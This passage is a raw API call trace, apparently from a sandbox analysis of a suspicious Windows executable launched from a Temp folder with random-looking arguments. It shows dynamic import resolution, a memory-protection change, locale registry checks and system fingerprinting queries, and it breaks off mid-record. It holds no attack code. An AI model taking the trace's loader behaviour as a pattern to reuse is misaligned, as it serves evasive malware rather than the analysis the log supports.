[0112.678] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 
[0112.678] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0112.679] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0112.679] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0112.679] GetProcAddress (hModule=0x76910000, 
lpProcName="GetVersion") returned 0x7695154e [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 
[0112.681] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0112.682] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 
[0112.682] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0112.682] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0112.682] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0112.682] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0112.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0112.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0112.683] GetProcAddress 
(hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0112.683] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0112.683] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0112.684] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0112.684] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0112.684] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") 
returned 0x76c17810 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0112.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0112.685] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0112.685] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0112.685] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0112.685] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0112.685] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0112.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0112.685] SetThreadLocale (Locale=0x400) returned 1 [0112.686] GetVersion () returned 0x1db10106 [0112.686] GetModuleHandleW 
(lpModuleName="kernel32.dll") returned 0x76910000 [0112.686] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0112.686] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.686] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0112.686] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.686] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0112.686] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0112.686] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.686] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0112.686] GetACP () returned 0x4e4 [0112.686] GetCurrentThreadId () returned 0xd84 [0112.686] GetVersion () returned 0x1db10106 [0112.686] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x211cb8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, 
dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0112.687] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.687] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.687] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] GetUserDefaultUILanguage () returned 0x409 [0112.688] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0112.688] GetThreadUILanguage () returned 0x120409 [0112.688] 
GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0112.688] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.689] GetUserDefaultUILanguage () returned 0x409 [0112.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 
[0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged 
instruction") returned 0x16 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0112.691] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, 
dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0112.691] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0112.691] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x224440 [0112.691] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0112.691] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: 
lpBuffer="The specified file was not found") returned 0x20 [0112.691] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0112.691] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.691] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0112.691] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0112.691] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0112.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: 
hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] GetThreadLocale () returned 0x409 [0112.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0112.692] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0112.692] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.692] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0112.692] 